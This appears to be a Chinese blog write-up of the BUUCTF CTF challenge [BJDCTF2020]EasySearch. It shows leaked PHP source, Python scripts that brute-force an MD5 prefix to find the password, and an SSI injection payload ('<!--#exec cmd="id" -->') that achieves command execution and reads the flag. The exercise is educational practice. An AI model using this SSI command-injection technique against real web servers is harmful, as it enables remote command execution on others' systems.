BUUCTF:[BJDCTF2020]EasySearch

左小米z

 关注

阅读 66

2023-06-19


BUUCTF:[BJDCTF2020]EasySearch_php


index.php.swp发现源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

首先验证password,然后username的值可控,但是写入.shtml文件,无法控制这个$file_html,查阅.shtml文件

  • .shtml文件:https://www.wenjianbaike.com/shtml.html

BUUCTF:[BJDCTF2020]EasySearch_bc_02


可以看到.shtml文件可以执行命令,格式:

<!--#exec cmd="id" -->

验证password脚本简单跑一下即可

import hashlib

chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for c1 in chars:
	for c2 in chars:
		for c3 in chars:
			for c4 in chars:
				res = c1 + c2 + c3 + c4
				md5_res = hashlib.md5(res.encode()).hexdigest()
				if md5_res[0:6] == '6d0bc1':
					print('{} {}'.format(res, md5_res))

或者用数字更快

import hashlib

for n in range(10000000):
	md5_n = hashlib.md5(str(n).encode()).hexdigest()
	if md5_n[0:6] == '6d0bc1':
		print('{} {}'.format(n, md5_n))

PS C:\Users\Administrator\Downloads> python .\code.py
2020666 6d0bc1153791aa2b4e18b4f344f26ab4
2305004 6d0bc1ec71a9b814677b85e3ac9c3d40
9162671 6d0bc11ea877b37d694b38ba8a45b19c
RhPd 6d0bc1e4a7920842ccce734925903e17

payload

username=<!--#exec cmd="id" -->&password=RhPd

运行之后在响应头反馈了访问URL

BUUCTF:[BJDCTF2020]EasySearch_BJDCTF2020_03


访问即可发现成功执行

BUUCTF:[BJDCTF2020]EasySearch_bc_04


在当前目录的上一级发现flag

BUUCTF:[BJDCTF2020]EasySearch_html_05


直接读取即可

BUUCTF:[BJDCTF2020]EasySearch_BUUCTF_06


相关推荐

[BJDCTF2020]EasySearch Apache SSI漏洞

山竹山竹px 27 0 0

BUUCTF WEB [BJDCTF2020]The mystery of ip

颜娘娘的碎碎念 66 0 0

BUUCTF [BJDCTF2020]认真你就输了 1

boomwu 41 0 0

BJDctf2020 Ezphp

小贴贴纸happy 75 0 0

[BJDCTF2020]----EzPHP

菜头粿子园 22 0 0

[BJDCTF2020]EzPHP

李雨喵 52 0 0

buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)

月半小夜曲_ 122 0 0

buu-[BJDCTF2020]JustRE

kmoon_b426 49 0 0

[BJDCTF2020]纳尼1

河南妞 69 0 0

[BJDCTF2020]BJD hamburger competition

Greatiga 33 0 0

精彩评论(0)

0 0 举报